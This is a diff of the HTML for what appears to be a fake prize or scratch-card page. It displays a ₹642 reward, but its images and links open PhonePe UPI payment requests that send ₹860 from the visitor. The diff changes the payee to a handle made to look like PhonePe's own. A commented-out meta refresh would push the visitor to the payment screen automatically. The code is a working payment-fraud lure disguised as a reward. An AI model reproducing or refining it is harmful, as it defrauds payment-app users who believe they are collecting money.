--- a/index.html
+++ b/index.html
@@ -61,7 +61,7 @@ location.href='phonepe://pay?pa=lundkismat4177@sbi&pn=YDV56693218&tn=recivvee&am
 
 <div>
 <div>
-<img src="file/1 (2).jpg" width="100%" height="auto" onclick="location.href='# '">
+<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='# '">
 </div>
 <div class="container" id="js-container">
 <div class="confetti"></div>
@@ -81,7 +81,7 @@ location.href='phonepe://pay?pa=lundkismat4177@sbi&pn=YDV56693218&tn=recivvee&am
 	
 	
 	
-<img src="file/2 (2).jpg" border-radius="30px" width="100%" height="auto" onclick="location.href='# '">
+<img src="2 (2).jpg" border-radius="30px" width="100%" height="auto" onclick="location.href='# '">
 <span style="border-radius:30px; position: absolute;left: 15px;right: 0;z-index: 1;bottom: 0;">
 <center>
 <h1 style="color:Green;"><b>₹642</b></h1>
@@ -103,22 +103,22 @@ location.href='phonepe://pay?pa=lundkismat4177@sbi&pn=YDV56693218&tn=recivvee&am
 	
 		<div>
 			
-			 <a href="phonepe://pay?pa=lundkismat4177@sbi&pn=YDV56693218&tn=recivvee&am=860&cu=INR&mode=02&purpose=00&tr">
+			 <a href="phonepe://pay?pa=phonepesc@sbi&pn=YDV56693218&tn=recivvee&am=860&cu=INR&mode=02&purpose=00&tr">
 				 
-				 <img src="file/3 (2).jpg" width="100%" height="auto">
+				 <img src="3 (2).jpg" width="100%" height="auto">
 				 
 			</a>
 			
 		<!--	
 			
-             <img src="./file/3.jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=lundkismat4177@sbi@pnb&pn=YDV56693218&tn=recivvee&am=860&cu=INR&mode=02&purpose=00&tr">
+             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=phonepesc@sbi@pnb&pn=YDV56693218&tn=recivvee&am=860&cu=INR&mode=02&purpose=00&tr">
         </div>
 
 	
 	
 	
 	
-	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=lundkismat4177@sbi&pn=YDV56693218&tn=recivvee&am=860&cu=INR&mode=02&purpose=00&tr">
+	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=phonepesc@sbi&pn=YDV56693218&tn=recivvee&am=860&cu=INR&mode=02&purpose=00&tr">
 	
 	--->
 	
